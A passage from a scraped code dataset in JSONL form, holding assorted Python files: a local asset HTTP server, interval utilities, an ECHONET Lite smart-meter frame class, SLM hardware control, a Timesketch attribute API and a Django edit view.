'application/octet-stream')\n\t\t\t\tself.end_headers()\n\n\t\t\t\tself.wfile.write(f.read())\n\t\t\t\tf.close()\n\n\t\t\t\tself.wfile.flush()\n\t\t\texcept IOError:\n\t\t\t\tself.send_error(404,'File Not Found: %s' % path)\n\t\treturn\n\n\tdef get_Scene(self, path):\n\t\tif path == \"\":\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\tself.end_headers()\n\t\t\tself.wfile.write(json.dumps({\"SceneList\": GetSceneListing()}).encode(\"utf-8\"))\n\t\t\tself.wfile.flush()\n\t\telse:\n\t\t\ttry:\n\t\t\t\tf = open(SCENE_FOLDER + \"/\" + path + \".\" + SCENE_SAVE_EXT, 'rb')\n\n\t\t\t\tself.send_response(200)\n\t\t\t\tself.send_header('Content-type', 'application/json')\n\t\t\t\tself.end_headers()\n\n\t\t\t\tself.wfile.write(f.read())\n\t\t\t\tf.close()\n\n\t\t\t\tself.wfile.flush()\n\t\t\texcept IOError:\n\t\t\t\tself.send_error(404,'File Not Found: %s' % path)\n\t\treturn\n\n\tdef put_Scene(self, path):\n\t\tglobal SERVER_ADDR\n\n\t\ttry:\n\t\t\tos.makedirs(SCENE_FOLDER)\n\t\texcept FileExistsError: pass\n\n\t\tlength = int(self.headers['Content-Length'])\n\t\t\t\n\t\twith open(SCENE_FOLDER + \"/\" + path + \".\" + SCENE_SAVE_EXT, 'wb') as f:\n\t\t\tf.write(self.rfile.read(length))\n\t\t\t\n\t\tnow = datetime.datetime.now()\n\n\t\tprint(\"%s - - [%d/%s/%d %02d:%02d:%02d] \\\"PUT %s with %d bytes\\\"\" % (\n\t\t\tSERVER_ADDR, now.day, calendar.month_abbr[now.month], now.year, now.hour, now.minute, now.second, path, length\n\t\t))\n\t\t\n\t\tself.send_response(201, \"Created\")\n\t\tself.end_headers()\n\n\t\treturn\n\ndef main():\n\tglobal SERVER_ADDR\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--bind\", help=\"Set the IP from which the server waits for incoming requests\")\n\targs = parser.parse_args()\n\t\n\tipAddr = \"\"\n\tif args.bind:\n\t\tSERVER_ADDR = args.bind\n\telse:\n\t\tSERVER_ADDR = \"127.0.0.1\"\n\t\tprint( \"Warning! You didn specify an IP to bind the HTTP-Server on.\" )\n\t\tprint( \"This could potentially lead to an unreachable Server, if localhost isn't mapped to the preferred IPv4-Address.\" )\n\t\tprint( \"The bound IP-Address is in most cases the same address which gets queried for Assets.\\n\" )\n\t\n\ttry:\n\t\thttpd = HTTPServer((SERVER_ADDR, 80), MyHandler)\n\t\tprint('AssetServer started on %s. Serving...' % (SERVER_ADDR))\n\t\thttpd.serve_forever()\n\t\t\n\texcept KeyboardInterrupt:\n\t\tprint ('^C received, shutting down server')\n\t\thttpd.socket.close()\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"tbienias/AURA","sub_path":"UnityProject/AssetServer.py","file_name":"AssetServer.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13699117976","text":"import math\n\ndef divisorGenerator(n):\n large_divisors = []\n for i in range(1, int(math.sqrt(n) + 1)):\n if n % i == 0:\n yield i\n if i*i != n:\n large_divisors.append(n / i)\n for divisor in reversed(large_divisors):\n yield divisor\n\nm=int(input())\nn=int(input())\narray=[]\nfor i in range(m):\n hello=list(map(int,input().split()))\n array.append(hello)\nif m==2 and n==2:\n res=array[0][0]\n find=list(divisorGenerator(res))\n for k in range(len(find)):\n if find[k]>m and find[k]>n:\n find.remove(find[k])\n value='11'\n value='01'\n \n \n","repo_name":"hamza-yusuff/CP-algo","sub_path":"jj lie.py","file_name":"jj lie.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"75358402542","text":"class NotAnIntervalExceptions(Exception):\n\t#print \"NotAnInterval\"\n\tpass\nclass IllegalIntervalException(Exception):\n\t#print \"IllegalInterval\"\n\tpass\nclass NoOverLapException(Exception):\n\tpass\n\nclass Interval:\n\tdef __init__(self, s):\n\t\tlbrack, middle, rbrack = s[0], s[1:-1], s[-1]\n\t\ttry:\n\t\t\tlower,upper = middle.split(',')\n\t\t\tassert(lbrack in [\"[\", \"(\"])\n\t\t\tassert(rbrack in [\"]\", \")\"])\n\t\t\tself.lower = int(lower)\n\t\t\tself.upper = int(upper)\n\t\texcept:\n\t\t\traise NotAnIntervalExceptions(s + \" not an interval!\")\n\t\tself.linclusive = (lbrack == \"[\")\n\t\tself.rinclusive = (rbrack == \"]\")\t\t\n\t\n\t\tif self.real_lower() > self.real_upper():\n\t\t\traise IllegalIntervalException(s + \" illegal interval!\")\n\t\t\t\n\tdef real_upper(self):\n\t\treturn self.upper if self.rinclusive else self.upper - 1\n\tdef real_lower(self):\n\t\treturn self.lower if self.linclusive else self.lower + 1\n\tdef __repr__(self):\n\t\treturn self.linclusive*'[' + (not self.linclusive)*'('+\\\n\t\tstr(self.lower)+','+str(self.upper)+self.rinclusive*']'+\\\n\t\t (not self.rinclusive)*')'\n\t\n\tdef __eq__(self, other):\n\t\tif isinstance(other, self.__class__):\n\t\t\treturn self.__dict__ == other.__dict__\n\t\telse:\n\t\t\treturn False\n\n\t\ndef merge_intervals(x,y):\n\tif x.real_upper() < y.real_lower()-1 or x.real_lower() > y.real_upper()+1:\n\t\traise NoOverLapException(str(x) + str(y) + \" do not overlap!\")\n\tresult = Interval(\"[0,1]\")\n\tif x.real_lower() < y.real_lower():\n\t\tresult.lower = x.lower\n\t\tresult.linclusive = x.linclusive\n\telse:\n\t\tresult.lower = y.lower\n\t\tresult.linclusive = y.linclusive\n\t\n\tif x.real_upper() > y.real_upper():\n\t\tresult.upper = x.upper\n\t\tresult.rinclusive = x.rinclusive\n\telse:\n\t\tresult.upper = y.upper\n\t\tresult.rinclusive = y.rinclusive\n\treturn result\n\ndef merge_overlapping(intervallist):\n\tintervallist.sort(key = lambda x:x.real_lower)\n\tresult = []\n\ttemp = intervallist[0]\n\tfor i in range(len(intervallist)-1):\n\t\ttry:\n\t\t\ttemp = merge_intervals(temp, intervallist[i+1])\n\t\texcept:\n\t\t\t#print \"break\"\n\t\t\tresult.append(temp)\n\t\t\ttemp = intervallist[i+1]\n\tresult.append(temp)\n\treturn result\n\n\ndef compare_intervals(x, y):\n\treturn x.real_lower() - y.real_lower()\n\n\ndef insert(ilist, newint):\n\tnewlist = ilist[:]\n\tfor interval in newlist:\n\t\tif newint.lower <= interval.lower:\n\t\t\tnewlist.insert(newlist.index(interval), newint)\n\t\t\tbreak\n\tif len(newlist) == len(ilist):\n\t\tnewlist.append(newint)\n\treturn newlist\n\n","repo_name":"fs1214/Programming-for-DS","sub_path":"assignment5/interval.py","file_name":"interval.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13308451888","text":"import datetime\n\n\nclass EchonetLite:\n \"\"\"# ECHONET Lite クラス\"\"\"\n \n # ECHONETサービス(ESV)\n ESV_CODE = {\n 'seti': b'\\x60',\n 'setc': b'\\x61',\n 'get': b'\\x62',\n 'inf_req': b'\\x63',\n 'setget': b'\\x6e',\n 'set_res': b'\\x71',\n 'get_res': b'\\x72',\n 'inf': b'\\x73',\n 'infc': b'\\x74', \n 'infc_reg': b'\\x7a',\n 'setget_res': b'\\x7e',\n 'seti_sna': b'\\x50',\n 'setc_sna': b'\\x51',\n 'get_sna': b'\\x52',\n 'inf_sna': b'\\x53',\n 'setget_sna': b'\\x5e'}\n \n # クラスグループコード\n CLS_GRP_CODE = {\n 'sensor': b'\\x00', # センサ関連機器クラスグループ\n 'airconditioner': b'\\x01', # 空調関連機器クラスグループ\n 'housing': b'\\x02', # 住宅・設備関連機器クラスグループ\n 'cooking': b'\\x03', # 調理・家事関連機器クラスグループ\n 'health': b'\\x04', # 健康関連機器クラスグループ\n 'control': b'\\x05', # 管理・操作関連機器クラスグループ\n 'av': b'\\x06', # AV健康関連機器クラスグループ\n 'profile': b'\\x0e', # プロファイルクラスグループ\n 'user': b'\\x0f'} # ユーザ定義クラスグループ\n\n # 管理・操作関連機器クラスグループ クラスコード\n CLS_CONTROL_CODE = { \n 'switch': b'\\xfd',\n 'portable': b'\\xfe',\n 'controller': b'\\xff'}\n\n # 機器オブジェクトスーパークラス EPC\n EPC_DICT = {\n 'operation_status': b'\\x80',\n 'location': b'\\x81',\n 'version': b'\\x82',\n 'idn': b'\\x83',\n 'fault_status': b'\\x88',\n 'manufacturer_code': b'\\x8a',\n 'facility_code': b'\\x8b',\n 'product_code': b'\\x8c',\n 'production_no': b'\\x8d',\n 'production_date': b'\\x8e',\n 'current_time': b'\\x97',\n 'current_date': b'\\x98',\n 'chg_pty_map': b'\\x9d',\n 'set_pty_map': b'\\x9e',\n 'get_pty_map': b'\\x9f'}\n \n # ECHONET Lite 電文構成(フレームフォーマット)\n frame = {\n 'ehd': bytes(2), # ECHONET Lite電文ヘッダ1,2\n 'tid': bytes(2), # トランザクションID\n 'seoj': bytes(3), # 送信元ECHONET Liteオブジェクト指定\n 'deoj': bytes(3), # 相手先ECHONET Liteオブジェクト指定\n 'esv': bytes(1), # ECHONET Liteサービス\n 'opc': bytes(1), # 処理プロパティー数\n 'ptys': []} # プロパティ列\n \n def __init__(self):\n self.frame['ehd'] = b'\\x10\\x81'\n self.frame['tid'] = b'\\x00\\x00'\n self.frame['seoj'] = b'\\x00\\x00\\x00'\n self.frame['deoj'] = b'\\x00\\x00\\x00'\n self.frame['esv'] = b'\\x00'\n self.frame['opc'] = b'\\x00'\n\n def set_tid(self, num):\n \"\"\"TID設定\"\"\"\n \n self.frame['tid'] = num.to_bytes(2, 'big')\n \n def get_tid(self):\n \"\"\"TID取得\"\"\"\n \n return int.from_bytes(self.frame['tid'], 'big')\n\n def set_eoj(self, sel, eoj):\n \"\"\"SEOJ, DEOJ設定\"\"\"\n \n if sel.upper() == 'S':\n self.frame['seoj'] = eoj\n elif sel.upper() == 'D':\n self.frame['deoj'] = eoj\n else:\n raise ValueError(sel)\n \n def get_eoj(self, sel):\n \"\"\"SEOJ, DEOJ取得\"\"\"\n \n if sel.upper() == 'S':\n return self.frame['seoj']\n elif sel.upper() == 'D':\n return self.frame['deoj']\n else:\n raise ValueError(sel)\n \n def set_esv(self, esv):\n \"\"\"ESV設定\"\"\"\n \n self.frame['esv'] = esv\n \n def get_esv(self):\n \"\"\"ESV取得\"\"\"\n \n return self.frame['esv']\n \n def reset_property(self):\n \"\"\"プロパティ列を空にする\"\"\"\n \n self.frame['ptys'] = []\n self.frame['opc'] = b'\\x00'\n\n @staticmethod\n def make_property(epc, edt = b''):\n \"\"\"プロパティを作成(dict形式)\"\"\"\n \n return {'epc': epc, 'pdc': len(edt).to_bytes(1, 'big'), 'edt': edt}\n\n def set_property(self, epc, edt = b''):\n \"\"\"プロパティを追加する\"\"\"\n \n pty = self.make_property(epc, edt)\n self.frame['ptys'].append(pty)\n self.frame['opc'] = len(self.frame['ptys']).to_bytes(1, 'big')\n\n def get_property(self, n):\n \"\"\"n番目のプロパティを取得 (dict形式)\"\"\"\n \n return self.frame['ptys'][n]\n\n def get_serialized_property(self, n):\n \"\"\"n番目のプロパティを取得 (bytes形式)\"\"\"\n \n \n pty = self.get_property(n)\n return pty['epc'] + pty['pdc'] + pty['edt']\n\n def get_frame(self):\n \"\"\"ECHONET Lite電文を取得 (dict形式)\"\"\"\n \n return self.frame\n \n def get_serialized_frame(self):\n \"\"\"ECHONET Lite電文を取得 (bytes形式)\"\"\"\n \n res = self.frame['ehd'] + self.frame['tid'] + self.frame['seoj'] + self.frame['deoj'] + \\\n self.frame['esv'] + self.frame['opc']\n for i in range(len(self.frame['ptys'])):\n res += self.get_serialized_property(i)\n return res\n\n @staticmethod\n def is_frame(frame):\n \"\"\"ECHONET Lite電文かどうか判断\"\"\"\n \n return True if frame[0:2] == b'\\x10\\x81' else False \n\n def make_frame(self, tid, esv, ptys):\n \"\"\"TID, ESV及びプロパティからECHONET Lite電文を組み立てる\n ptys: [[epc1, edt1], [epc2, edt2], ....]\"\"\"\n \n self.set_tid(tid) \n self.frame['esv'] = esv\n self.reset_property()\n for pty in ptys:\n self.set_property(pty[0], pty[1])\n return self.get_serialized_frame()\n\n def change_tid_frame(self, tid, frame):\n \"\"\"ECHONET Lite 電文のTIDを変更\"\"\"\n\n self.set_tid(tid)\n new_frame = frame[0:2] + self.frame['tid'] + frame[4:len(frame)]\n return new_frame\n\n def make_get_frame_dict(self):\n \"\"\"ECV辞書'EPC_DICT'を元に,Get電文を一括作成する。\"\"\"\n \n frame_dict = {}\n for key in self.EPC_DICT.keys():\n frame = self.make_frame(0, self.ESV_CODE['get'], [[self.EPC_DICT[key], b'']])\n frame_dict.update({'get_'+key: frame})\n return frame_dict\n\n def make_set_frame_dict(self):\n \"\"\"ECV辞書'EPC_DICT'を元に,Set電文を一括作成する。\"\"\"\n \n frame_dict = {}\n for key in self.EPC_DICT.keys():\n frame = self.make_frame(0, self.ESV_CODE['setc'], [[self.EPC_DICT[key], b'']])\n frame_dict.update({'set_'+key: frame})\n return frame_dict\n\n def parse_frame(self, res):\n \"\"\"ECHONET Lite 電文パーサー\"\"\"\n \n bt_res = bytes.fromhex(res)\n if len(bt_res) < 12: # EHD1~OPC:12byte\n return False\n if not self.is_frame(bt_res):\n return False\n\n frame = {'ehd': bt_res[0:2],\n 'tid': int.from_bytes(bt_res[2:4], 'big'),\n 'seoj': bt_res[4:7], \n 'deoj': bt_res[7:10],\n 'esv': bt_res[10:11],\n 'opc': int.from_bytes(bt_res[11:12], 'big'),\n 'ptys': []}\n\n idx = 12\n try: # ECHONET Liteプロパティ\n for i in range(frame['opc']):\n pty = {'epc': bt_res[idx:idx + 1],\n 'pdc': int.from_bytes(bt_res[idx + 1:idx + 2], 'big')}\n pty['edt'] = bt_res[idx+2:idx+2+pty['pdc']]\n frame['ptys'].append(pty)\n idx += 2 + pty['pdc']\n except:\n return False # フォーマットエラー\n \n if len(bt_res) != idx:\n return False # フォーマットエラー\n\n return frame\n\n\nclass EchonetLiteSmartEnergyMeter(EchonetLite):\n \"\"\"ECHONET Lite スマート電力量メータクラス\"\"\"\n\n CLS_LVSM_CODE = b'\\x88' # クラスコード(低圧スマート電力量メータ)\n\n ## EPC\n LVSM_EPC_DICT = {\n 'operation_status': b'\\x80',\n 'epc_coefficient': b'\\xd3',\n 'digits': b'\\xd7',\n 'amount_energy_normal': b'\\xe0',\n 'unit_amount_energy': b'\\xe1',\n 'hist_amount_energy1_norm': b'\\xe2',\n 'amount_energy_rev': b'\\xe3',\n 'hist_amount_energy1_rev': b'\\xe4',\n 'day_hist_amount_energy1': b'\\xe5',\n 'instant_power': b'\\xe7',\n 'instant_current': b'\\xe8',\n 'recent_amount_energy_norm': b'\\xea',\n 'recent_amount_energy_rev': b'\\xeb',\n 'hist_amount_energy2': b'\\xec',\n 'day_hist_amount_energy2': b'\\xed'}\n\n def __init__(self):\n super().__init__()\n \n self.frame['seoj'] = self.CLS_GRP_CODE['control'] + self.CLS_CONTROL_CODE['controller'] + b'\\x01'\n self.frame['deoj'] = self.CLS_GRP_CODE['housing'] + self.CLS_LVSM_CODE + b'\\x01'\n self.frame['esv'] = self.ESV_CODE['get']\n self.frame['opc'] = '\\x01'\n\n self.EPC_DICT.update(self.LVSM_EPC_DICT) # スーパークラスと自クラスのEPCを連結\n self.GET_FRAME_DICT = self.make_get_frame_dict() # Get電文辞書��一括作成\n\n self.set_property(self.EPC_DICT['operation_status']) # 仮のプロパティを設定\n\n @staticmethod\n def parse_datetime(dt_bytes):\n \"\"\"30分毎の計測値などに付随する日付&時間パーサー\n dt_bytes: bytes型日付&時間 YYYYMMDDhhmmss (7 byte)\n return: datetime.datetime型\"\"\"\n \n year = int.from_bytes(dt_bytes[0:2], 'big')\n month = int.from_bytes(dt_bytes[2:3], 'big')\n day = int.from_bytes(dt_bytes[3:4], 'big')\n hour = int.from_bytes(dt_bytes[4:5], 'big')\n minute = int.from_bytes(dt_bytes[5:6], 'big')\n second = int.from_bytes(dt_bytes[6:7], 'big')\n \n return datetime.datetime(year, month, day, hour, minute, second)\n","repo_name":"yawatajunk/Wi-SUN_EnergyMeter","sub_path":"echonet_lite.py","file_name":"echonet_lite.py","file_ext":"py","file_size_in_byte":10509,"program_lang":"python","lang":"ja","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"28585701798","text":"import csv\nfrom collections import Counter\nwith open (\"height-weight.csv\") as f:\n reader=csv.reader(f)\n file_data=list(reader)\nfile_data.pop(0)\nnew_data=[]\nfor i in range(len(file_data)):\n n_numb=file_data[i][1]\n new_data.append(float(n_numb))\ndata=Counter(new_data)\nmode_for_range={\n \"50-60\":0,\n \"60-70\":0,\n \"70-80\":0\n\n\n}\nfor height,occurance in data.items():\n if 50 < float(height) < 60:\n mode_for_range[\"50-60\"]+=occurance\n \n elif 60 < float(height) < 70:\n mode_for_range[\"60-70\"]+=occurance\n elif 70 < float(height) < 80:\n mode_for_range[\"70-80\"]+=occurance\nmoderange,modeoccurance=0,0\nfor range,occurance in mode_for_range.items():\n if occurance>modeoccurance:\n moderange,modeoccurance=[int(range.split(\"-\")[0]),int(range.split(\"-\")[1])],occurance\nmode=float((moderange[0]+ moderange[1])/2)\nprint(\"mode = \"+str(mode))","repo_name":"aryamangoenka/c-104","sub_path":"mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29441390795","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 15 19:54:41 2022\n\n@author: jlab\n\"\"\"\n\nimport serial\nimport numpy as np\nimport time\nimport clr, sys\nclr.AddReference(r'C:\\Program Files (x86)\\Cypress\\EZ-USB FX3 SDK\\1.3\\bin\\CyUSB')\nimport CyUSB\n\n\nclass GlvUSB:\n def __init__(self, dev_idx=0):\n device_list = CyUSB.USBDeviceList(CyUSB.CyConst.DEVICES_CYUSB.to_bytes(1, sys.byteorder))\n self.dev = device_list.get_Item(dev_idx)\n assert self.dev is not None\n self.dev.BulkOutEndPt.TimeOut = 1000\n self.msg_size = np.int32(4096)\n self.buf = bytearray(self.msg_size)\n \n def upload_pattern(self, buf):\n #assert len(pixvals) == 1088\n err = self.dev.BulkOutEndPt.XferData(buf, self.msg_size)\n return err\n \n \nclass HSBuddy:\n def __init__(self, comport, verbose=True):\n self.port = serial.Serial(comport, 115200, timeout=1)\n self.verbose = verbose\n self.glvusb = GlvUSB()\n \n def __del__(self):\n self.port.close()\n \n def write(self, cmd):\n self.port.flushInput()\n self.port.write(str.encode(cmd+'\\r'))\n \n def read_answer(self):\n out = self.port.read_until(b'\\r>')\n return out\n \n def poll(self, cmd):\n self.port.flushOutput()\n self.write(cmd)\n out = self.read_answer().decode(\"utf-8\").splitlines()\n out = '\\n'.join(out)\n if self.verbose: \n print(out)\n else:\n return out\n \n def status(self):\n return self.poll('STAT') \n \n def bootup(self):\n return self.poll('BOOTUP')\n \n def vddah(self):\n return self.poll('VDDAH 350')\n \n \n \n \nclass patterns:\n def calculate_pattern_from_position_def(wl,dx,dy,f,def_f,x0,y0):\n #y - first pass SLM, short axis\n #x - second pass SLM, long axis\n # dx, dy, f in um\n # wl wavelength in um\n # 0.01843 = lambda/pixel width\n thetax = np.arctan(dx/f);\n thetay = np.arctan(dy/f);\n defocusfactor = def_f;\n \n rdist_x = np.linspace((-272+x0)/272,(272+x0)/272,544)\n rdist_y = np.linspace((-272+y0)/272,(272+y0)/272,544)\n \n def_x = (defocusfactor*rdist_x**2)\n def_y = (defocusfactor*rdist_y**2)\n \n phi_x = np.empty(544)\n phi_y = np.empty(544)\n c = wl/25.5; #wavelength/pixel pitch in um\n \n if thetax == 0: \n Nx = 0\n phi_x [:] = def_x#%(2*np.pi);\n if thetay == 0:\n phi_y [:] = def_y#%(2*np.pi);\n Ny = 0\n else:\n Ny = c/(np.sin(thetay))\n phi_y = (np.linspace(0,2*np.pi*544/Ny,544)+def_y)#%(2*np.pi)\n \n else:\n Nx = c/(np.sin(thetax));\n phi_x = (np.linspace(0,2*np.pi*544/Nx,544)+def_x)#%(2*np.pi)\n if thetay == 0:\n phi_y [:] = def_y#%(2*np.pi);\n Ny = 0\n else:\n Ny = c/(np.sin(thetay))\n phi_y = (np.linspace(0,2*np.pi*544/Ny,544)+def_y)#%(2*np.pi)\n \n phi = np.concatenate([phi_y, phi_x]) \n return Ny,Nx,phi\n \n def calculate_pixvals(pattern, calib_f, calib_p, wl, maxpi): #f=690 p=4\n pattern = pattern%(2*np.pi)\n maxpi_wl = maxpi*(473/wl);\n pattern_adj = pattern+((maxpi_wl-2)*np.pi)/2\n pattern_adj[pattern_adj<0]= 0\n pattern_adj[pattern_adj>maxpi_wl*np.pi]= maxpi_wl*np.pi\n calib_fun = lambda x: calib_f*np.power(x,1/calib_p); \n pixvals = calib_fun(pattern_adj*(wl/473));\n return pixvals\n \n \n \n \n \n","repo_name":"danionella/RandomAccessSLM","sub_path":"slmRA_hardware.py","file_name":"slmRA_hardware.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41509150439","text":"import logging\n\nfrom flask import jsonify\nfrom flask import request\nfrom flask import abort\nfrom flask_restful import Resource\nfrom flask_login import login_required\nfrom flask_login import current_user\n\nfrom timesketch.api.v1 import resources\nfrom timesketch.api.v1 import utils\nfrom timesketch.lib import ontology as ontology_lib\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_OK\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_BAD_REQUEST\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_CREATED\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_FORBIDDEN\nfrom timesketch.lib.definitions import HTTP_STATUS_CODE_NOT_FOUND\nfrom timesketch.models import db_session\nfrom timesketch.models.sketch import Attribute\nfrom timesketch.models.sketch import AttributeValue\nfrom timesketch.models.sketch import Sketch\n\n\nlogger = logging.getLogger(\"timesketch.sketch_api\")\n\n\nclass AttributeResource(resources.ResourceMixin, Resource):\n \"\"\"Resource for sketch attributes.\"\"\"\n\n def _validate_form_entry(self, form, key_to_check):\n \"\"\"Check a form value and return an error string if applicable.\n\n Args:\n form (dict): the dict that keeps the form data.\n key_to_check (str): the key in the form data to check against.\n\n Returns:\n An empty string if there are no issues, otherwise an\n error string to use to abort.\n \"\"\"\n value = form.get(key_to_check)\n if not value:\n return \"Unable to save an attribute without a {0:s}.\".format(key_to_check)\n\n if not isinstance(value, str):\n return \"Unable to save an attribute without a {0:s}.\".format(key_to_check)\n\n return \"\"\n\n @login_required\n def get(self, sketch_id):\n \"\"\"Handles GET request to the resource.\n\n Returns:\n An analysis in JSON (instance of flask.wrappers.Response)\n \"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, \"No sketch found with this ID.\")\n\n if not sketch.has_permission(current_user, \"read\"):\n abort(\n HTTP_STATUS_CODE_FORBIDDEN, \"User does not have read access to sketch\"\n )\n\n return jsonify(utils.get_sketch_attributes(sketch))\n\n @login_required\n def post(self, sketch_id):\n \"\"\"Handles POST request to the resource.\n\n Returns:\n A HTTP 200 if the attribute is successfully added or modified.\n \"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, \"No sketch found with this ID.\")\n\n if not sketch.has_permission(current_user, \"write\"):\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"User does not have write permission on the sketch.\",\n )\n\n form = request.json\n if not form:\n form = request.data\n\n if not form:\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"Unable to add or modify an attribute from a \"\n \"sketch without any data submitted.\",\n )\n\n for check in [\"name\", \"ontology\"]:\n error_message = self._validate_form_entry(form, check)\n if error_message:\n return abort(HTTP_STATUS_CODE_BAD_REQUEST, error_message)\n\n name = form.get(\"name\")\n ontology = form.get(\"ontology\", \"text\")\n\n ontology_def = ontology_lib.ONTOLOGY\n ontology_dict = ontology_def.get(ontology, {})\n cast_as_string = ontology_dict.get(\"cast_as\", \"str\")\n\n values = form.get(\"values\")\n if not values:\n return abort(\n HTTP_STATUS_CODE_BAD_REQUEST, \"Missing values from the request.\"\n )\n\n if not isinstance(values, (list, tuple)):\n return abort(HTTP_STATUS_CODE_BAD_REQUEST, \"Values needs to be a list.\")\n\n value_strings = [\n ontology_lib.OntologyManager.encode_value(x, cast_as_string) for x in values\n ]\n\n if any([not isinstance(x, str) for x in value_strings]):\n return abort(\n HTTP_STATUS_CODE_BAD_REQUEST,\n \"All values needs to be stored as strings.\",\n )\n\n attribute = None\n message = \"\"\n update_attribute = False\n for attribute in sketch.attributes:\n if (attribute.name == name) and (attribute.ontology == ontology):\n message = \"Attribute Updated\"\n update_attribute = True\n break\n\n if update_attribute:\n _ = AttributeValue.query.filter_by(attribute=attribute).delete()\n else:\n attribute = Attribute(\n user=current_user, sketch=sketch, name=name, ontology=ontology\n )\n\n db_session.add(attribute)\n db_session.commit()\n\n for value in value_strings:\n attribute_value = AttributeValue(\n user=current_user, attribute=attribute, value=value\n )\n attribute.values.append(attribute_value)\n db_session.add(attribute_value)\n db_session.commit()\n\n db_session.add(attribute)\n db_session.commit()\n\n return_data = {\n \"name\": name,\n \"ontology\": ontology,\n \"cast_as\": cast_as_string,\n }\n response = None\n if message:\n return_data[\"action\"] = \"update\"\n response = jsonify(return_data)\n response.status_code = HTTP_STATUS_CODE_OK\n else:\n return_data[\"action\"] = \"create\"\n response = jsonify(return_data)\n response.status_code = HTTP_STATUS_CODE_CREATED\n\n return response\n\n @login_required\n def delete(self, sketch_id):\n \"\"\"Handles delete request to the resource.\n\n Returns:\n A HTTP response code.\n \"\"\"\n sketch = Sketch.query.get_with_acl(sketch_id)\n if not sketch:\n abort(HTTP_STATUS_CODE_NOT_FOUND, \"No sketch found with this ID.\")\n\n if not sketch.has_permission(current_user, \"write\"):\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"User does not have write permission on the sketch.\",\n )\n\n form = request.json\n if not form:\n form = request.data\n\n if not form:\n return abort(\n HTTP_STATUS_CODE_FORBIDDEN,\n \"Unable to remove an attribute from a \"\n \"sketch without any data submitted.\",\n )\n\n for check in [\"name\", \"ontology\"]:\n error_message = self._validate_form_entry(form, check)\n if error_message:\n return abort(HTTP_STATUS_CODE_BAD_REQUEST, error_message)\n\n name = form.get(\"name\")\n ontology = form.get(\"ontology\", \"text\")\n\n for attribute in sketch.attributes:\n if attribute.name != name:\n continue\n if attribute.ontology != ontology:\n continue\n\n for value in attribute.values:\n attribute.values.remove(value)\n sketch.attributes.remove(attribute)\n db_session.commit()\n\n return HTTP_STATUS_CODE_OK\n\n return abort(\n HTTP_STATUS_CODE_BAD_REQUEST,\n \"Unable to delete the attribute, couldn't find it.\",\n )\n","repo_name":"google/timesketch","sub_path":"timesketch/api/v1/resources/attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","stars":2388,"dataset":"github-code","pt":"91"}
+{"seq_id":"14813980407","text":"# coding=utf-8\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic.edit import UpdateView\n\nfrom modules.personnel_operation.models import QualityAssurance\nfrom modules.share_module.check_decorator import check_principal\nfrom modules.share_module.permissionMixin import class_view_decorator\n\n\n@class_view_decorator(login_required)\n@class_view_decorator(permission_required('personnel_operation.change_qualityassurance', raise_exception=True))\n@class_view_decorator(check_principal) # 校验是否负责该项目\nclass PersonnelUpdate(SuccessMessageMixin, UpdateView):\n\ttemplate_name = \"personnel_edit.html\"\n\tmodel = QualityAssurance\n\tsuccess_message = u\"%(problems_items)s 成功��改\"\n\tfields = [\n\t\t\"department\",\n\t\t\"project_id\",\n\t\t\"index_items\",\n\t\t\"problems_items\",\n\t\t\"problems_explain\",\n\t\t\"error_number\",\n\t\t\"provider\",\n\t\t\"error_date\",\n\t\t\"improve_time\",\n\t\t\"improve_status\",\n\t\t\"improve_date\",\n\t\t\"remark\",\n\t\t\"remark1\",\n\t\t\"remark2\",\n\t\t\"remark3\"\n\t]\n\n\tdef get_success_url(self):\n\t\tself.url = reverse('personnel_info:personnel_list', args=())\n\n\t\treferrer = self.request.POST.get(\"referrer\", \"\")\n\t\tif referrer:\n\t\t\tself.url = referrer\n\n\t\t_addanother = self.request.POST.get(\"_addanother\", \"\")\n\t\tif _addanother:\n\t\t\tself.url = reverse('personnel_info:personnel_add')\n\t\treturn self.url\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(PersonnelUpdate, self).get_context_data(**kwargs)\n\t\tcontext[\"form_content\"] = u\"修改个人操作质量\"\n\t\treferrer = self.request.META.get('HTTP_REFERER', \"\")\n\t\tcontext[\"referrer\"] = referre\n\t\treturn context\n","repo_name":"xuhuiliang-maybe/ace_office","sub_path":"modules/personnel_operation/code/personnel_edit.py","file_name":"personnel_edit.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
